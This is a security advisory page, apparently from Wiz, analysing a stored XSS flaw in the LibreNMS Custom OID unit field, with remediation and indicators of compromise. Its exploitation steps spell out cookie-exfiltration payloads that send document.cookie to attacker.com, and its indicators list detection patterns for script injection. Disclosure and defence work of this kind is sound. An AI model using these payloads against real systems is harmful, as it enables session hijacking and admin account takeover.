CVE-2026-27016: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-27016 is a stored Cross-Site Scripting (XSS) vulnerability in LibreNMS affecting the Custom OID feature's unit parameter, which lacks strip_tags() sanitization. The unsanitized value is stored in the database and rendered without HTML escaping, allowing any authenticated user with device edit permissions to inject persistent malicious scripts. Affected versions span from 24.10.0 up to (but not including) 26.2.0. It was disclosed on February 17, 2026, and carries a CVSS v3.1 base score of 5.4 (Medium) (GitHub Advisory).

Technical details

The root cause is an inconsistent input sanitization pattern (CWE-79, CWE-116) in includes/html/forms/customoid.inc.php: while the name, oid, and datatype POST parameters are passed through strip_tags(), the unit parameter is assigned directly from $_POST['unit'] without any sanitization. The raw value is stored in the database and later retrieved in graphs/customoid.inc.php, where it is concatenated into output and echoed without HTML escaping. An attacker with low-privilege access (device edit permissions) can submit a payload such as <script>alert("XSS")</script> or an <img onerror=...> tag as the unit value, which then executes in the browser of any user who views the affected device's graphs. A PoC demonstrating the vulnerable code path is included in the GitHub Security Advisory (GitHub Advisory, Fix Commit).

Impact

Successful exploitation enables persistent script execution in the browsers of all LibreNMS users who view device graphs containing the malicious Custom OID, not just the attacker's own session. Primary consequences include session hijacking via cookie theft, admin account takeover, and the ability to perform unauthorized actions on behalf of victims. Because the payload persists in the database and executes for every affected page view, the attack has a broad blast radius across all users of the installation, including administrators (GitHub Advisory).

Exploitability

No in-the-wild exploitation has been reported, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.005% (0th percentile), indicating a very low probability of near-term exploitation. Exploitation requires an authenticated account with device edit permissions, limiting the attack surface, though a PoC is publicly documented in the GitHub Security Advisory (GitHub Advisory).

Exploitation steps

  1. Obtain low-privilege access: Acquire or compromise a LibreNMS account with device edit permissions on a target installation running versions 24.10.0 through 26.1.x.
  2. Navigate to Custom OID configuration: Access the device settings and locate the Custom OID feature for a monitored device.
  3. Inject XSS payload into the Unit field: In the "Unit" input field, enter a malicious payload such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script> or <img src=x onerror=fetch('https://attacker.com/?c='+document.cookie)>. Other fields (name, OID, datatype) are sanitized and will not carry the payload.
  4. Save the Custom OID: Submit the form; the unsanitized payload is stored directly in the database.
  5. Wait for victim interaction: Any LibreNMS user (including administrators) who navigates to the device's graph page will trigger the stored payload, executing the script in their browser context.
  6. Harvest session tokens or perform actions: The script can exfiltrate session cookies to an attacker-controlled server, enabling session hijacking and subsequent admin account takeover (GitHub Advisory, Fix Commit).

Indicators of compromise

  • Logs: LibreNMS web server access logs showing POST requests to the Custom OID form endpoint (customoid.inc.php) with unusual or encoded HTML/script content in the unit parameter; repeated GET requests to device graph pages (graphs/customoid.inc.php) from multiple user accounts shortly after a Custom OID was modified.
  • Database: Entries in the Custom OID table (customoids) where the customoid_unit column contains HTML tags, JavaScript, or encoded script content (e.g., <script>, <img onerror=, javascript:).
  • Network: Outbound HTTP requests from user browsers to unexpected external domains immediately after loading LibreNMS device graph pages, potentially carrying session cookie data as query parameters.
  • Application Behavior: Unexpected logouts, session invalidations, or admin-level configuration changes occurring without corresponding admin activity in audit logs, which may indicate session hijacking following XSS exploitation.

Mitigation and workarounds

Upgrade LibreNMS to version 26.2.0 or later, which applies the fix by adding strip_tags((string) $_POST['unit']) to the unit parameter in includes/html/forms/customoid.inc.php (PR #19040, commit 3bea263) (Fix Commit, Release 26.2.0). No configuration-based workaround is available; the only effective remediation is patching. As an interim measure, restrict device edit permissions to fully trusted users only to reduce the attack surface.

Community reactions

The vulnerability was reported by security researcher decsecre583 and is noted as related to a prior incomplete fix for CVE-2024-51494, suggesting a pattern of incomplete sanitization in the Custom OID feature. The LibreNMS maintainer (murrant) merged the fix promptly on February 16, 2026, one day before the advisory was published. A technical write-up was published by Infinit Security shortly after disclosure (Infinit Security). No significant broader media coverage or social media discussion has been identified.

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management